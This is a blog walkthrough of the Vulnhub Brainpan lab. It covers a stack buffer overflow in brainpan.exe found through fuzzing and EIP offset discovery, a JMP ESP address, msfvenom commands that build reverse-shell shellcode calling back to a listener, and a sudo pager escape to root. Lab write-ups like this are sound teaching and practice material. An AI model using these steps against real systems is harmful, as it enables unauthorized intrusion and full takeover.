Vulnhub BRAINPAN Walkthrough

After installing the host on VMWare we start scanning it with nmap :

Nmap –A –T4 –p- 192.168.1.5 –vv

As we can see only 2 ports are open port 9999 and 10000 .. so we start visiting using the browser with the ip address along with the two ports.

Port 9999:

Port 10000

The next step is to use netcat : nc 192.168.1.5 9999

Whatever password I use seems to be not working so lets try another way …lets start nikto and dirb

With nikto and dirb I got the same results which is a directory /bin

An exe file which means a buffer overflow is he next step to try … so I started a windows 7 machine and downloaded the brainpan.exe and with immunity debugger here we go …

I used a github BOF scripts and tweaked it a bit to make a fuzzing to the file on windows 7 locate the vlaue needed for the buffer overflow

The app crashed at around 700 bytes … now to fund the exact value needed to over write the EIP … we start the pattern_create –l 700

We copy the value to the next ..

Restart the debugger and start the script again

We are interested in the EIP value 35724134 .. start pattern_offset –q  35724134  and the result is 524

Next script  we contain the offset value we found 524 with some of bad characters ( google them )

EIP flooded with values of “A”s and “B”s

Now we successfully over written the EIP .. next we need to put the buffer in ESP … lets first find the JMP ESP value by running nasm

Using mona module !mona find -s “\xff\xe4” -m brainpan.exe

The value we looking for is 0x311712f3 … and to verify the JMP ESP we select GO TO >> EXPRESSION

Next creating a shellcode with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=4444 -b “\x00\x0a” -e x86/shikata_ga_nai -fc

Copy the result to the next script :

After running the script and listening on port 4444 we get shell

I got shell to the windows 7 system … so i went back to the BRAINPAN host and tried the same steps but couldn’t escape the shell and sometimes it crashes using this script pty;pty.spawn(“/bin/bash”);’

So what I did is I went back and changed the payload to linux and the encoding to alpha_upper

msfvenom -p linux/x86/shell_reverse_tcp -b “\x00” LHOST=192.168.1.11 LPORT=4444 R -e x86/alpha_upper -f c

and with msfconsole I was able to get shell and then tried pty;pty.spawn(“/bin/bash”);’   and now it’s working

after that you can use sudo -l and follow what on the screen

You need to enter : sudo /home/anansi/bin/anansi_util manual ifconfig

When the message appears saying (PRESS RETURN) write !/bin/bash and you will get root access

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s